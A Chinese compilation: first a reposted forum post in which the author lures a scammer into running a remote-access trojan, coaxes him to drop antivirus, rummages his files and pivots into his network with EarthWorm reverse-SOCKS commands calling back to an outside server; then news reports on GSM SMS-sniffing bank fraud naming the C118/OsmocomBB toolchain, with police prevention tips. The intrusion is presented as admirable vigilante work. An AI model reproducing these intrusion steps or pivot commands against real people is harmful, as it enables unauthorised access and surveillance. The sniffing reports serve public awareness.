豫好很久,還是用這個(gè)標(biāo)題吧。為什么要用這個(gè)標(biāo)題? 其實(shí)說實(shí)話,安全技術(shù)只是我業(yè)余愛好而已,所以論技術(shù)的話,在I春秋里面,我可能只屬于【腳本小子】。
發(fā)文章只是分享技術(shù),分享思路,僅此而已。(當(dāng)然在I春秋投稿有獎(jiǎng)勵(lì)的,哈哈,歡迎各位大表哥投稿。)
現(xiàn)在這個(gè)操蛋的社會(huì),真正愿意無私分享技術(shù)的并不多,我也算是看淡了,在這我要感謝i春秋幫助過我的各位表哥,特別要感謝一個(gè)人【空格】表哥。
在我遇到各種困難的時(shí)候,空格表哥第一個(gè)愿意抽出寶貴時(shí)間協(xié)助我解決,真的非常感謝。
好像扯遠(yuǎn)了,那么我們進(jìn)入正題吧。
前段時(shí)間,一個(gè)陌生人加我辦公的QQ,說是我們董事長(zhǎng),并讓我轉(zhuǎn)告我們財(cái)務(wù)加他QQ。
這種一看就知道是騙子,我不動(dòng)聲色登錄了小號(hào),打算套路他一波。
我小號(hào)加上他以后,開始套路。
騙子要求我把余額截圖給他。
我登錄上網(wǎng)上銀行,通過審查元素把我的余額 一塊二毛五 修改成2500多萬,然后發(fā)給騙子。
對(duì)方可能看到這么多錢,太過激動(dòng),立即要求我匯款到指定賬號(hào)....哈哈
到一步,我開始思考,錢是肯定不能給他匯的(我沒錢,也不傻^_^),那么如何弄到更多證據(jù)或者拿到騙子的信息呢?
一、首先我考慮到騙子登錄的IP地址可能進(jìn)行了偽造,我抓取到他IP可能進(jìn)行定位的準(zhǔn)確度并不高。
二、如果發(fā)文件進(jìn)行釣魚的話,擔(dān)心騙子太奸詐,露餡就不好玩了。
三、如果一定要發(fā)文件進(jìn)行釣魚,我想法如下(office最近的0day漏洞,或者快捷方式漏洞,最后再考慮直接發(fā)木馬。)
那么我先來試探下,看看對(duì)方對(duì)網(wǎng)絡(luò)安全防范意識(shí)如何。
我首先寫了個(gè)頁(yè)面,在頁(yè)面內(nèi)加入一個(gè)CNZZ統(tǒng)計(jì)的JS(作用是記錄訪問者的IP地址)
然后套路他,引誘對(duì)方打開,這樣我就可以記錄下他IP地址,然后進(jìn)行定位了。
半分鐘后,騙子說打不開,哈哈 你能打開就怪了,因?yàn)轫?yè)面內(nèi)就一段文字,加上一個(gè)統(tǒng)計(jì)代碼。
我開始登陸cnzz統(tǒng)計(jì)后臺(tái),大概兩分鐘后,抓到了騙子的IP地址。
通過對(duì)IP地址進(jìn)行定位發(fā)現(xiàn) ,精準(zhǔn)度非常低,這說明對(duì)方的IP地址應(yīng)該是一個(gè)動(dòng)態(tài)IP。
我用遠(yuǎn)控生成一個(gè)遠(yuǎn)控木馬,誘騙對(duì)方說要轉(zhuǎn)賬的話,需要他登錄我們oa平臺(tái),然后進(jìn)行申請(qǐng),然而oa平臺(tái)壓根就打不開的,我誘騙他安裝這個(gè)木馬(騙子完全沒有安全防范意識(shí)),我說只有安裝以后才能打開我們oa平臺(tái)。
半分鐘后,騙子說打不開,哈哈,你能打開就真的怪了,因?yàn)檫@壓根就是一個(gè)遠(yuǎn)控。
不過我考慮到現(xiàn)在很多人都安裝有殺毒軟件,因?yàn)槲疫@個(gè)遠(yuǎn)控不免殺,肯定會(huì)被攔截,我繼續(xù)誘導(dǎo)他關(guān)閉殺毒軟件,再次運(yùn)行木馬。
但是發(fā)現(xiàn)我想多了,哈哈,因?yàn)槲疫M(jìn)行控制的服務(wù)器已經(jīng)提示對(duì)方上線了。
在控制臺(tái)發(fā)現(xiàn)對(duì)方已經(jīng)上線,我已經(jīng)可以完全控制對(duì)方電腦。
第一個(gè)是我本地測(cè)試遠(yuǎn)控是否能正常上線的虛擬機(jī),第二個(gè)是騙子的電腦,那么我先來看看這騙子在干嘛。
終于發(fā)現(xiàn)騙子的套路,先通過QQ添加好友,搜索詞輸入“技術(shù)部”,然后挨個(gè)添加很多公司的技術(shù)部QQ。
對(duì)方通過以后,騙子用某個(gè)查詢平臺(tái),查詢對(duì)方公司的法人名字,然后冒充對(duì)方公司法人進(jìn)行詐騙。
詐騙的話語(yǔ)都是一樣的套路。
看了一下他電腦右下角,嚇尿,同時(shí)登陸好幾個(gè)QQ進(jìn)行詐騙。
而且壓根沒裝殺毒軟件,安全意識(shí)還是太低。(難道騙子沒有技術(shù)團(tuán)隊(duì)嗎?壞笑中......)
我通過遠(yuǎn)控開始翻他電腦上的文件,看看能不能找到更多證據(jù)。
我在他桌面上發(fā)現(xiàn)好多個(gè)txt文件,其中一個(gè)就有對(duì)方發(fā)送給我的詐騙卡號(hào)。
繼續(xù)翻文件,發(fā)現(xiàn)桌面有個(gè)文檔記錄了很多地區(qū)的聯(lián)系人,包括國(guó)外的,這應(yīng)該是個(gè)詐騙集團(tuán),或者是他上線。
那么這事就嚴(yán)重了,我收集好各種證據(jù),并通過某位表哥聯(lián)系江蘇當(dāng)?shù)鼐剑丫€索提交給對(duì)方,希望警方能盡快拿下這個(gè)詐騙團(tuán)伙。
在我提交給警方證據(jù)后,我思考,就目前的證據(jù)來看,根本無法確定騙子的具體位置。
所以我打算進(jìn)入騙子路由器,拿到路由器里面的寬帶賬號(hào),因?yàn)閷拵з~號(hào)現(xiàn)在都是需要身份證和具體地址信息才能辦理的。
那么拿到寬帶賬號(hào)后,只要警方配合當(dāng)?shù)仉娦殴静樵円幌拢_子的具體位置信息就查出來了。
我通過反彈代理后,成功進(jìn)入他局域網(wǎng),進(jìn)入路由器后并沒有發(fā)現(xiàn)寬帶號(hào)。用一臺(tái)服務(wù)器監(jiān)聽反彈端口,命令如下:
Earthworm.exe -s rcsocks -l 1008 -e 888
在目標(biāo)上執(zhí)行
c:\Earthworm.exe -s rssocks -d 8.8.8.8 -e 888
其中8.8.8.8是你監(jiān)聽的服務(wù)器IP。
連接成功以后,使用SocksCap64代理本機(jī)反彈的端口,即可進(jìn)入對(duì)方局域網(wǎng)。
具體操作看我這一片文章《從后臺(tái)弱口令到內(nèi)網(wǎng)漫游》0x06
https://bbs.ichunqiu.com/thread-27270-1-1.html
經(jīng)過分析發(fā)現(xiàn),他的wan口是一個(gè)局域網(wǎng)IP,然后通過tracert跟蹤路由,發(fā)現(xiàn)這應(yīng)該是聯(lián)通或者移動(dòng)常用的大局域網(wǎng)結(jié)構(gòu),或者是無線網(wǎng)卡,連上網(wǎng)絡(luò)后給你分配一個(gè)內(nèi)網(wǎng)ip地址 。
想查具體位置還是比較難的,而且這個(gè)騙子只是行騙過程使用這臺(tái)電腦,用完就關(guān)機(jī)斷網(wǎng),想收集他個(gè)人信息基本行是不可能的。
因?yàn)椴榈綄?duì)方局域網(wǎng)還有幾臺(tái)設(shè)備,設(shè)備名稱和騙子這臺(tái)大致相同,所以判斷應(yīng)該也是PC了,所以打算通過嗅探局域網(wǎng)看看能不能拿到其他電腦上的一些關(guān)于騙子的個(gè)人信息 。
那么問題來了,很多嗅探工具都需要安裝winpcap環(huán)境才能運(yùn)行,還有的比如cain是需要登錄到對(duì)方電腦進(jìn)行可視化嗅探。
第一點(diǎn),安裝winpcap環(huán)境目前很多都是有界面的,不能在命令下安裝,找到一個(gè)能再命令下安裝的,可是還不支持64位(對(duì)方是win7 64位系統(tǒng))
第二點(diǎn),如果要遠(yuǎn)程登錄目標(biāo)上進(jìn)行安裝,那么win7 64位的系統(tǒng)默認(rèn)是不支持多用戶登錄的,你這邊登錄,他那邊就彈出來了。
我找了個(gè)支持多用戶登錄的補(bǔ)丁丟上去,發(fā)現(xiàn)還是不行,可是我在本地搭建win7的環(huán)境測(cè)試的確可以多用戶登錄的。
以下是我本地測(cè)試打了補(bǔ)丁以后,遠(yuǎn)程登錄后虛擬機(jī)并沒有彈出來。
但是在通過反彈登錄到目標(biāo)電腦時(shí),會(huì)提醒是否頂?shù)魧?duì)方,如果點(diǎn)是的話,對(duì)方就會(huì)彈出來了。
目前也沒有好辦法能突破,希望有想法的表哥可以給點(diǎn)意見,小弟在此謝謝了。
總結(jié):
一、此事希望能給各位朋友一個(gè)警示,網(wǎng)上凡是關(guān)于現(xiàn)金的信息,一定要打電話和對(duì)方確認(rèn),避免被騙。
二、電腦一定要安裝殺毒軟件,并保持病毒庫(kù)更新到最新狀態(tài)。
三、不管是誰(shuí)給你發(fā)文件,一定要謹(jǐn)慎打開,就算是朋友發(fā)來的,你壓根不能確定對(duì)方的QQ是否已經(jīng)被盜。
四、如果被騙,一定要先撥打110報(bào)警。
本文作者:jasonx,轉(zhuǎn)載自:https://bbs.ichunqiu.com/thread-29341-1-1.html
源:中央廣電總臺(tái)中國(guó)之聲
沒丟手機(jī)也沒丟銀行卡,沒掃二維碼也沒點(diǎn)短信鏈接,一覺醒來銀行卡里的錢竟然沒了!
最近,河南鄭州、新鄉(xiāng)等地多個(gè)小區(qū)的居民遇到了這樣的離奇事件,他們綁定手機(jī)支付平臺(tái)的銀行卡,半夜三更被神秘消費(fèi)、莫名盜刷。
記者跟隨警方的案情線索深入調(diào)查發(fā)現(xiàn),犯罪嫌疑人利用黑科技設(shè)定了“黑色三公里”。在這個(gè)范圍內(nèi),被設(shè)備攔截的手機(jī)收到的每一條信息、每一個(gè)驗(yàn)證碼,所綁定銀行卡里的錢款,都等同于在犯罪嫌疑人的指尖“裸奔”。
隔空盜刷背后暗藏怎樣的風(fēng)險(xiǎn)漏洞?又要如何防范?
“嗅探” 三公里內(nèi)刷爆所有銀行卡
小王:“正睡覺了,聽見手機(jī)短信一直響,說我在哪哪哪幾點(diǎn)消費(fèi)了幾千塊錢。”
2018年5月的一個(gè)深夜,短短幾分鐘,幾十條短信提示聲,把河南新鄉(xiāng)的小王從睡夢(mèng)中驚醒。
短信的內(nèi)容是消費(fèi)扣款的通知。新鄉(xiāng)市延津縣公安局刑偵三中隊(duì)中隊(duì)長(zhǎng)陳亭介紹說,跟小王住在同一小區(qū)的多名受害人,都有同樣的遭遇:
陳亭:“都是在凌晨的兩三點(diǎn)、三四點(diǎn)鐘,手機(jī)接到大量的類似于帶有驗(yàn)證碼的付款短信。”
通過追蹤資金流向,警方很快鎖定了以孫某為首的五名犯罪嫌疑人,操縱盜刷他人銀行卡的“黑科技”也浮出水面。
民警抓捕現(xiàn)場(chǎng):“東西呢?在這呢……”
警方:“這個(gè)設(shè)備就是他們的采集設(shè)備,采集設(shè)備就是采集移動(dòng)、聯(lián)通手機(jī)號(hào),這是叫嗅探設(shè)備,就是用來專門攔截手機(jī)短信。”
根據(jù)孫某的供述,他們?cè)诟=垘r還有一個(gè)上線,盜刷銀行卡的“嗅探”設(shè)備就是從那里購(gòu)買的。隨后辦案民警趕往福建龍巖,將犯罪嫌疑人張某抓獲。
至此,一個(gè)遍布全國(guó)、利用“短信嗅探”攔截驗(yàn)證碼,進(jìn)而盜刷他人銀行卡的犯罪團(tuán)伙被連根拔起。
“嗅探”到底是一個(gè)什么樣的網(wǎng)絡(luò)“黑科技”,竟然能攔截他人的信息、驗(yàn)證碼,再實(shí)施盜刷?
犯罪嫌疑人張某向警方交代:
張某:“這個(gè)手機(jī)號(hào)在我的設(shè)備范圍之內(nèi),我們可以攔到它的驗(yàn)證碼,用它的手機(jī)號(hào)登錄一些APP、網(wǎng)站、網(wǎng)頁(yè),可以查詢到機(jī)主的一些個(gè)人信息,然后通過這些盜刷。”
賣家:嗅探一開 錢嘩嘩進(jìn)賬
經(jīng)過多方聯(lián)系,記者匿名進(jìn)入到一個(gè)名為“嗅探”的QQ群,群里一個(gè)名為“創(chuàng)富力電子嗅探”的群成員推銷說:
賣家:“我們最新款的有手機(jī)型短信嗅探器,可以直接嗅探附近的手機(jī)短信。”
記者明確表達(dá)了購(gòu)買“嗅探”設(shè)備的意向,然后根據(jù)賣家提供的接頭地點(diǎn),來到位于廣州的一棟破舊大樓里,這里到處都是放風(fēng)的人,一名二十多歲的的年輕人接待了記者:
賣家:“你好,想看什么產(chǎn)品?”
記者:“想看一看短信嗅探那個(gè)設(shè)備。”
賣家:“要范圍攔截還是做指定攔截?”
記者:“就是附近的攔截的那種。”
賣家:“方圓附近就是攔截一到五公里,看你距離多遠(yuǎn)。”
除了單位攔截,賣家表示還能提供定制服務(wù),也就是特定號(hào)碼攔截,只要知道對(duì)方的電話號(hào)碼,就能攔截他的短信、驗(yàn)證碼,進(jìn)而盜刷他綁定在手機(jī)上的銀行卡:
記者:“指定號(hào)碼攔截有沒有距離限制?”
賣家:“那就沒有,知道他的號(hào)碼,把號(hào)碼導(dǎo)進(jìn)去就可以了。”
記者:“假如我知道他號(hào)碼,他人在北京,我也可以攔截么?”
賣家:“沒錯(cuò),指定號(hào)碼攔截沒有限制這個(gè)距離。”
隨后賣家拿出設(shè)備供記者查看,并表示只要把“嗅探”放在合適的位置,可以不停的有錢進(jìn)賬:
記者:“這還帶個(gè)手機(jī)?”
賣家:“就是到時(shí)你攔截到的信息都是在這個(gè)手機(jī)里面搜集的,哪怕你就是轉(zhuǎn)手給人家,也就通過電腦導(dǎo)出去。到使用支付平臺(tái)多的一些地方去攔截,你就是哪怕攔截一個(gè)小時(shí)兩個(gè)小時(shí)就足夠了。
記者實(shí)驗(yàn):手機(jī)被“嗅探”操控
達(dá)成交易后,賣家通過快遞從上海將一套“嗅探”設(shè)備寄給了記者,包裹里還隱藏了一個(gè)小小的U盤。在記者收到包裹的同時(shí),一個(gè)自稱是“嗅探技術(shù)員”的電話打了過來,遠(yuǎn)程指導(dǎo)設(shè)備安裝:
嗅探技術(shù)員:“把這個(gè)U盤系統(tǒng)插上電腦,然后開機(jī)直接進(jìn)入這個(gè)U盤的系統(tǒng)。”
通過安裝人員的介紹,“短信嗅探”的指揮系統(tǒng),其實(shí)就是那個(gè)U盤,賣家把設(shè)置好的“攔截程序”隱藏在U盤里。操作流程簡(jiǎn)單的說,就是利用“嗅探”掃描周圍用戶的手機(jī)號(hào),然后再攔截用戶的短信,與此同時(shí)用戶仍可正常收取短信,不易被察覺。攔截到的信息包括收發(fā)短信雙方的手機(jī)號(hào)碼,以及信息的內(nèi)容。而只要“嗅探”開始掃描,附近一到五公里內(nèi)幾乎所有的手機(jī)收到短信的同時(shí),他們的電腦上也會(huì)收到同樣的短信。賣家“技術(shù)員”給記者做了一個(gè)演示:
嗅探技術(shù)員:“第一條攔截是紅顏色,第二第三條是藍(lán)顏色,這兩邊都能看到,顯示是一樣的。頻點(diǎn)出來了,一共掃描到12個(gè),然后我們要的就是這個(gè)等號(hào)后面這些數(shù)字。”
安全黑洞 百萬隱私信息已泄漏
更可怕的是,購(gòu)買嗅探設(shè)備,賣家還贈(zèng)送了他們搜集來的“個(gè)人信息”材料,包括姓名、電話號(hào)碼、家庭住址,甚至還有家庭成員的姓名和電話。還有一種更高級(jí)的個(gè)人信息,就是銀行卡號(hào)、開戶行,甚至還包括銀行卡密碼。
記者留意到,普通的個(gè)人信息大多是通過快遞單號(hào)搜集來的,在其中一些信息上,還有“簽收”兩個(gè)字。而這幾百萬條信息上的地址,有河南、廣東、湖南、四川等等,涵蓋全國(guó)多個(gè)省份。
如何防止手機(jī)被“嗅探”
凌晨時(shí)分實(shí)施更改密碼的盜刷,設(shè)備異地郵寄規(guī)避警方檢查,再加上非法搜集獲取個(gè)人信息,“短信嗅探”盜刷已經(jīng)形成了完整的黑色利益鏈,每個(gè)環(huán)節(jié)各自分工,相互配合。那么,我們究竟要如何防范,才能避免落入此類陷阱?
今年5月,在河南鄭州也發(fā)生多起盜刷案件,受害者被盜取金額最大的有十幾萬元。和新鄉(xiāng)延津的盜刷案件一樣,受害者也幾乎都是住在同一個(gè)小區(qū),盜刷時(shí)間也集中在凌晨。辦案民警發(fā)現(xiàn),一旦被“嗅探”設(shè)備盯上,手機(jī)信號(hào)可能會(huì)出現(xiàn)異常,迅速?gòu)?G變成2G,接著就會(huì)頻繁的收到帶有驗(yàn)證碼的短信,然后銀行卡、支付寶就被盜刷了。
鄭州市公安局二路崗分局案?jìng)纱箨?duì)副大隊(duì)長(zhǎng)史非介紹說:
史非:“它相當(dāng)于把真實(shí)的基站消掉以后,它使用了一個(gè)偽基站的原理,相當(dāng)于您的這個(gè)手機(jī)連接這個(gè)基站,接收或者發(fā)送一條短信的時(shí)候,我這邊機(jī)器也能夠接收到這個(gè)短信,他獲取這個(gè)信息之后,晚上再做這個(gè)撞庫(kù)的操作。”
史非說,很多人的支付寶賬號(hào)就是本人的手機(jī)號(hào)碼,犯罪嫌疑人通過這個(gè)手機(jī)號(hào)在支付寶或者其他第三方支付平臺(tái)操作,如更改密碼,然后手機(jī)會(huì)接到一條更改密碼的動(dòng)態(tài)密碼短信,這個(gè)時(shí)候“嗅探”設(shè)備則會(huì)同步看到這一密碼,通過密碼實(shí)施盜刷:
史非:“當(dāng)時(shí)我們查獲的短信嗅探設(shè)備,這個(gè)是采集的機(jī)器和天線,都是犯罪嫌疑人自己改裝的,這個(gè)是6個(gè),這個(gè)是無線路由器、外置天線,這是這個(gè)操作的電腦主機(jī)。”
雖然“嗅探”聽起來很嚇人,但并不代表不法分子可以為所欲為,我們也可以進(jìn)行有效的防范。史非說,如果手機(jī)信號(hào)突然降為2G,并收到很多不明短信驗(yàn)證碼,那么這時(shí)手機(jī)很可能已經(jīng)被“嗅探”設(shè)備劫持攻擊。
史非:“如果我們的居民在日常工作和生活當(dāng)中,在這個(gè)平時(shí)工作的地點(diǎn)包括生活的地點(diǎn)是4G網(wǎng)絡(luò)信號(hào)很穩(wěn)定的情況下,突然哪天發(fā)現(xiàn)我的手機(jī)信號(hào)降網(wǎng)了,已經(jīng)到2G工作狀態(tài)的時(shí)候,就有可能在我們的身邊有偽基站或者是短信嗅探設(shè)備已經(jīng)開機(jī)了,這個(gè)時(shí)候我們的居民要高度重視。減小損失的最安全的方式,(手機(jī))要么關(guān)機(jī),要么進(jìn)入飛行狀態(tài),這樣的話能保證我們居民的財(cái)產(chǎn)安全。”
警方重要提醒!
防止被“嗅探”盜刷,一定做好以下幾點(diǎn):
1、平時(shí)要做好手機(jī)號(hào)、身份證號(hào)、銀行卡號(hào)、支付平臺(tái)賬號(hào)等敏感的私人信息保護(hù)。
2、如果自己的手機(jī)信號(hào)忽然從4G降到2G,有可能手機(jī)會(huì)受到攻擊,請(qǐng)馬上暫時(shí)啟動(dòng)飛行模式。
3、假如收到不明短信驗(yàn)證碼,要馬上意識(shí)到可能已被劫持攻擊,并可考慮暫時(shí)關(guān)機(jī)。
4、如果早上起來,看到半夜收到奇怪的驗(yàn)證碼短信,一定要想到可能是遇到短信嗅探攻擊,如果發(fā)現(xiàn)錢被盜刷了,火速凍結(jié)銀行卡,保留短信內(nèi)容,報(bào)警。
位手機(jī)用戶接連收到短信驗(yàn)證碼。
一名黑產(chǎn)設(shè)備賣家的QQ空間。
一位安全圈人士發(fā)送給新京報(bào)記者的配置好的摩托羅拉C118手機(jī)。
二手平臺(tái)上有賣家出售短信嗅探采集系統(tǒng)。
“覺得隱私被泄露了,很害怕。”不久前的一天下午,石家莊科技工程職業(yè)技術(shù)學(xué)院的小程在學(xué)校附近突然接到許多短信驗(yàn)證碼。小程不知道的是,她的這次特殊經(jīng)歷的背后,極可能隱藏著一條盤踞已久的黑色產(chǎn)業(yè)鏈。
多位安全圈人士向新京報(bào)記者表示,小程的遭遇可能與一種被稱為“GSM劫持 短信嗅探”的技術(shù)有關(guān)。其實(shí),這并非個(gè)例。此前曾發(fā)生過凌晨收到上百條驗(yàn)證碼,結(jié)果發(fā)現(xiàn)被盜刷的案件。
新京報(bào)記者調(diào)查發(fā)現(xiàn),這項(xiàng)黑產(chǎn)的入門門檻極低,所需代碼均為開源。只需要在網(wǎng)上花費(fèi)不到30元購(gòu)買一部摩托羅拉C118手機(jī),黑產(chǎn)從業(yè)者便可以窺探到用戶手機(jī)內(nèi)的短信內(nèi)容。在此背景下,盜刷銀行卡成為可能。更為可怕的是,短信嗅探只是龐大黑色產(chǎn)業(yè)帝國(guó)中的冰山一角。通過手機(jī)號(hào),業(yè)內(nèi)人員還可以利用社工庫(kù)等手段獲悉用戶的開房、住址等諸多敏感信息,從而可以輕易勾勒出用戶畫像。
經(jīng)過記者進(jìn)一步調(diào)查,實(shí)際上是2G網(wǎng)絡(luò)協(xié)議的天然缺陷為其提供了犯罪的溫床。
“準(zhǔn)空姐”30秒收29條驗(yàn)證碼短信
每每回憶起不久前一天下午的遭遇,小程總是眉頭緊皺。“覺得隱私被泄露了,很害怕。”
那天,正打算去逛街的她剛剛走出校門沒多遠(yuǎn),一向安靜的手機(jī)突然提示聲音不斷,來自各個(gè)APP的驗(yàn)證碼短信接踵而來。
小程是一名“準(zhǔn)空姐”。不久前,經(jīng)過6次和競(jìng)爭(zhēng)對(duì)手的角逐,她終于在南方航空的面試中脫穎而出,等待著培訓(xùn)的到來。“看到南航短信驗(yàn)證碼的時(shí)候像木頭人一樣,十分害怕會(huì)對(duì)未來有影響。”除了網(wǎng)貸和一些支付平臺(tái)的密碼外,兩條來自南方航空的驗(yàn)證碼讓小程格外擔(dān)心。對(duì)她而言,所有包含“南方航空”這四個(gè)字眼的信息都可以輕而易舉觸及她的未來。
“從來沒碰到過這樣的事情。”為了躲避這些突如其來的短信提示聲,小程在愣了不到兩秒鐘之后,將手機(jī)調(diào)為了飛行模式。“因?yàn)槲尹c(diǎn)開一個(gè)看了一下,每個(gè)驗(yàn)證碼后面都寫著有效時(shí)間,就本能地這么做了。”
事后,據(jù)統(tǒng)計(jì),小程在不到30秒的時(shí)間里,共收到29條驗(yàn)證碼短信。
小程不知道的是,她的這次特殊經(jīng)歷的背后,極有可能隱藏著一條盤踞已久的黑色產(chǎn)業(yè)鏈。有類似遭遇的,也并非只有她一個(gè)人。不過,其他人不是每個(gè)都像小程一樣幸運(yùn)。
“通過一種短信嗅探設(shè)備,可以直接嗅探到電信用戶所有的手機(jī)短信。”意圖“上岸”的老呂(化名)介紹。“上岸”是黑產(chǎn)從業(yè)者中的行話,為了規(guī)避風(fēng)險(xiǎn),一些黑產(chǎn)從業(yè)者會(huì)在從事一段時(shí)間后“金盆洗手”。他表示,“黑產(chǎn)從業(yè)者有專門的手機(jī)號(hào)采集裝備,利用采集到的手機(jī)號(hào),可以在點(diǎn)卡網(wǎng)等實(shí)行找回密碼等操作,實(shí)現(xiàn)盜刷。但是,這種設(shè)備只能攻擊2G網(wǎng)絡(luò)條件下的手機(jī)。配合降頻設(shè)備,也可以強(qiáng)制讓覆蓋范圍內(nèi)手機(jī)網(wǎng)絡(luò)狀態(tài)變?yōu)?G,從而實(shí)現(xiàn)降頻攻擊。”
醒來錢沒了,多地發(fā)生短信嗅探盜刷
與小程類似,去年7月30日,微博網(wǎng)友@-美年達(dá)芬奇發(fā)現(xiàn),凌晨她的手機(jī)收到100多條驗(yàn)證碼,包括支付寶、京東、銀行APP等。據(jù)介紹,有人使用她的京東賬戶、支付寶等預(yù)訂房間、給加油卡充值,總計(jì)盜刷了1萬多元。當(dāng)時(shí),多位業(yè)內(nèi)人士懷疑并提及了一項(xiàng)名為“GSM劫持 短信嗅探”的技術(shù)。
指針撥回到去年11月,武漢市漢陽(yáng)區(qū)警方四天連續(xù)接到5起蹊蹺案件。受害人起床后發(fā)現(xiàn)手機(jī)收到大量驗(yàn)證碼和扣款短信,銀行卡里的錢沒有了。其中,損失最多的受害人在一夜之間,卡內(nèi)1.9萬元被人分17次轉(zhuǎn)走。2019年3月7日上午,漢陽(yáng)區(qū)公安分局刑偵大隊(duì)民警將犯罪嫌疑人趙某某、舒某某控制,湖北首起利用“短信嗅探”技術(shù)的新型詐騙案告破。據(jù)報(bào)道,自去年9月份以來,兩名犯罪嫌疑人實(shí)施作案30余起,共獲利20余萬元。
3月27日,南昌市西湖區(qū)人民法院開庭審理了江西省首起利用短信嗅探設(shè)備實(shí)施網(wǎng)絡(luò)盜竊消費(fèi)的案件,這條黑色產(chǎn)業(yè)鏈也浮出水面。
據(jù)查明,被告人胡某、李某、何某三人通過QQ、微信認(rèn)識(shí)后,分工合作,共同實(shí)施盜竊。胡某為“料主”,利用短信嗅探設(shè)備獲取方圓500米內(nèi)可以作案的手機(jī)號(hào)和機(jī)主姓名,后將該信息轉(zhuǎn)發(fā)至其上線李某;李某找他人查詢?cè)撌謾C(jī)號(hào)碼機(jī)主的身份信息以及關(guān)聯(lián)的銀行卡信息,再將該信息轉(zhuǎn)發(fā)至其上線何某(業(yè)內(nèi)稱“出料”);何某利用短信驗(yàn)證的方式通過快捷支付在博彩網(wǎng)站盜刷或者用微信、支付寶在京東商城進(jìn)行消費(fèi)。在一個(gè)月的時(shí)間里,被告人胡某伙同李某、何某作案1起、伙同他人作案2起,盜取他人財(cái)物共計(jì)8671元。
值得注意的是,這項(xiàng)黑產(chǎn)技術(shù)生命力頗為頑強(qiáng),雖被多地警方所關(guān)注并打擊,但仍在重拳整治下生存至今。
售價(jià)1000元的嗅探技術(shù)其實(shí)只要30元?
新京報(bào)記者調(diào)查發(fā)現(xiàn),短信嗅探設(shè)備易得、操作簡(jiǎn)便,實(shí)際上為黑產(chǎn)從業(yè)者設(shè)立了相當(dāng)?shù)偷拈T檻。
“只需要一部摩托羅拉C118手機(jī)就可以實(shí)現(xiàn)短信嗅探。”一位業(yè)內(nèi)人士告訴新京報(bào)記者,“在網(wǎng)上,可以很容易地買到。”
在某電商平臺(tái),記者通過搜索關(guān)鍵詞“采集C118”后,出現(xiàn)12個(gè)名為“C118采集器系統(tǒng)軟件全套”的商品。其中絕大多數(shù)商品封面或?yàn)樾崽匠晒Φ南到y(tǒng)后臺(tái),或?yàn)橐呀?jīng)改裝好的摩托羅拉C118。新京報(bào)記者在一個(gè)系統(tǒng)后臺(tái)的封面圖片底部中注意到,“您好!您于2018-11-29 18:25:16.使用外部電商平臺(tái)充值服務(wù)為135××××××××號(hào)碼充值50.00元”這句話被用紅線標(biāo)注。“在線學(xué)習(xí),包教會(huì)設(shè)備和系統(tǒng),可以監(jiān)測(cè)直徑約500米范圍的2G短信。”其中一名賣家告訴新京報(bào)記者,“全套設(shè)備和系統(tǒng)代碼共1000元。”
新京報(bào)記者以買家身份和多名嗅探設(shè)備賣家取得聯(lián)系。為了展示產(chǎn)品的真實(shí)性,幾乎每個(gè)嗅探設(shè)備的賣家,都會(huì)主動(dòng)給記者展示大量其設(shè)備正常運(yùn)行的視頻。在嗡鳴的風(fēng)扇聲中,他們將改裝過的摩托羅拉C118與筆記本電腦連接妥當(dāng)。登錄系統(tǒng)后不久,實(shí)驗(yàn)手機(jī)接收到的短信內(nèi)容便會(huì)出現(xiàn)在視頻中泛黃的屏幕中。
然而,對(duì)于這項(xiàng)技術(shù)而言,其實(shí)“并不值1000元”。
“那些都是騙剛?cè)胄械男“椎模@套設(shè)備的價(jià)格完全等價(jià)于硬件的價(jià)格,不會(huì)超過100元。”老呂告訴記者。據(jù)其介紹,硬件上,只需要購(gòu)買一個(gè)不到30元錢的摩托羅拉C118手機(jī),用幾個(gè)常用電子元件改裝便可;而軟件上,將修改過的OsmocomBB編譯進(jìn)摩托羅拉C118手機(jī)里面,就可以為手機(jī)添加嗅探功能。
公開資料顯示,OsmocomBB是從硬件層到應(yīng)用層徹徹底底開源的GSM協(xié)議實(shí)現(xiàn)項(xiàng)目。因?yàn)槭情_源,黑產(chǎn)從業(yè)者可以輕而易舉獲得該代碼,甚至不必大量去學(xué)習(xí)通信相關(guān)專業(yè)知識(shí),就能實(shí)現(xiàn)并模擬GSM協(xié)議,按照自己的需求隨意更改,添加功能。
據(jù)安全圈人士于小葵(化名)向新京報(bào)記者介紹,除了摩托羅拉C118,還有摩托羅拉、索尼愛立信的多個(gè)機(jī)型,均可被用于該技術(shù)。但是,摩托羅拉C118卻成為眾多黑產(chǎn)從業(yè)者的不二選擇。“摩托羅拉C118兼容性最好,價(jià)格便宜,所以也就成為了最合適的手機(jī)。”于小葵說。
值得一提的是,部分平臺(tái)短信驗(yàn)證碼內(nèi)容的不合理,實(shí)際上也間接提供了犯罪的溫床。“其實(shí),這個(gè)設(shè)備只能嗅探到2G短信內(nèi)容,但并不能嗅探到手機(jī)號(hào)。”老呂坦言,“用戶手機(jī)中很多短信內(nèi)容都包含用戶的手機(jī)號(hào),用這個(gè)手機(jī)號(hào)登錄一些充值平臺(tái),然后點(diǎn)擊更改密碼或者直接充值,就可以技術(shù)變現(xiàn)。”
在老呂看來,一些平臺(tái)發(fā)送給用戶的驗(yàn)證碼中直接包括電話號(hào)碼,實(shí)際上也為黑產(chǎn)從業(yè)者提供了一定的便利。“不過,也有專門的手機(jī)號(hào)碼采集器可以采集到用戶的手機(jī)號(hào)。”
只針對(duì)2G信號(hào)?從4G降為2G也要小心
去年9月17日,2018國(guó)家網(wǎng)絡(luò)安全宣傳周——網(wǎng)絡(luò)安全博覽會(huì)開幕,有展館展出了多種網(wǎng)絡(luò)黑灰產(chǎn)作案工具,其中便包括能夠悄無聲息偷走手機(jī)短信的“2G短信嗅探設(shè)備”。
據(jù)介紹,2G短信嗅探設(shè)備總材料價(jià)格不足100元,但可以做到獲取周邊任何人的短信內(nèi)容,危害特別大。基站以廣播方式轉(zhuǎn)發(fā)到用戶手里的加密短信,可被這套設(shè)備所截取并破解還原出來,最終被黑產(chǎn)用戶實(shí)現(xiàn)信息竊取、資金盜刷和網(wǎng)絡(luò)詐騙等犯罪。此前此類犯罪只針對(duì)移動(dòng)與聯(lián)通,不針對(duì)電信,同時(shí)這種犯罪只針對(duì)2G信號(hào)。
“但其實(shí),手機(jī)在3G或4G時(shí)的特定情景下也有可能被監(jiān)控到,原因是通過特殊設(shè)備壓制或者信號(hào)質(zhì)量不佳導(dǎo)致信號(hào)降頻。”知道創(chuàng)宇404實(shí)驗(yàn)室副總監(jiān)隋剛告訴新京報(bào)記者。
